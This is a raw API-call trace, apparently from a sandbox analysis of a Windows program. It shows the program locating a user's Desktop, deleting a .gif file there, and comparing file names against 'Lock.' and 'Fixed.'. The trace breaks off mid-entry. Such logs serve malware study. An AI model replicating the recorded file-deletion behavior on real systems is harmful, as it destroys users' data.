[0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.567] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0164.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0164.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0164.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0164.568] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0164.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0164.568] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0164.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0164.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0164.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0164.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0164.570] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/eGIW Yzvh.gif", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eGIW Yzvh.gif", lpFilePart=0x8bedfc*="eGIW Yzvh.gif") returned 0x33 [0164.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0164.570] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eGIW Yzvh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\egiw yzvh.gif")) returned 0x20 [0164.570] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eGIW Yzvh.gif", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436f1980, ftCreationTime.dwHighDateTime=0x1d4c978, ftLastAccessTime.dwLowDateTime=0x2939a370, ftLastAccessTime.dwHighDateTime=0x1d4cf7a, ftLastWriteTime.dwLowDateTime=0x2939a370, ftLastWriteTime.dwHighDateTime=0x1d4cf7a, nFileSizeHigh=0x0, nFileSizeLow=0xe924, dwReserved0=0x3d, dwReserved1=0x4, cFileName="eGIW Yzvh.gif", cAlternateFileName="EGIWYZ~1.GIF")) returned 0xaa55e0 [0164.570] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eGIW Yzvh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\egiw yzvh.gif")) returned 1 [0164.572] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436f1980, ftCreationTime.dwHighDateTime=0x1d4c978, ftLastAccessTime.dwLowDateTime=0x2939a370, ftLastAccessTime.dwHighDateTime=0x1d4cf7a, ftLastWriteTime.dwLowDateTime=0x2939a370, ftLastWriteTime.dwHighDateTime=0x1d4cf7a, nFileSizeHigh=0x0, nFileSizeLow=0xe924, dwReserved0=0x3d, dwReserved1=0x4, cFileName="eGIW Yzvh.gif", cAlternateFileName="EGIWYZ~1.GIF")) returned 0 [0164.572] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0164.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.572] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0164.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0164.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0164.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0164.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0164.573] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0164.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0164.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0164.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0164.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0164.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0164.573] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0164.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0164.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0164.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0164.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0164.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0164.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0164.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0164.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0164.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0164.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0164.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0164.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0164.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0164.575] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/eGIW Yzvh.gif", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eGIW Yzvh.gif", lpFilePart=0x8bf658*="eGIW Yzvh.gif") returned 0x33 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0164.575] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eGIW Yzvh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\egiw yzvh.gif")) returned 0xffffffff [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.575] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0164.576] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.576] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0164.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0164.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0164.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0164.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0164.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0164.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0164.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0164.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FN4XiavIO4PR.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N4XiavIO4PR.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4XiavIO4PR.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XiavIO4PR.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iavIO4PR.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avIO4PR.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vIO4PR.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IO4PR.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O4PR.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4PR.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PR.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0164.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.577] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0164.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0164.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0164.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FN4XiavIO4PR.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N4XiavIO4PR.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4XiavIO4PR.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0164.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XiavIO4PR.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iavIO4PR.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avIO4PR.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0164.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vIO4PR.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IO4PR.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O4PR.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4PR.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0164.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PR.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.578] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0164.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0164.578] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0164.578] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0164.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0164.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0164.578] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0164.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0164.579] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0164.579] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0164.579] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 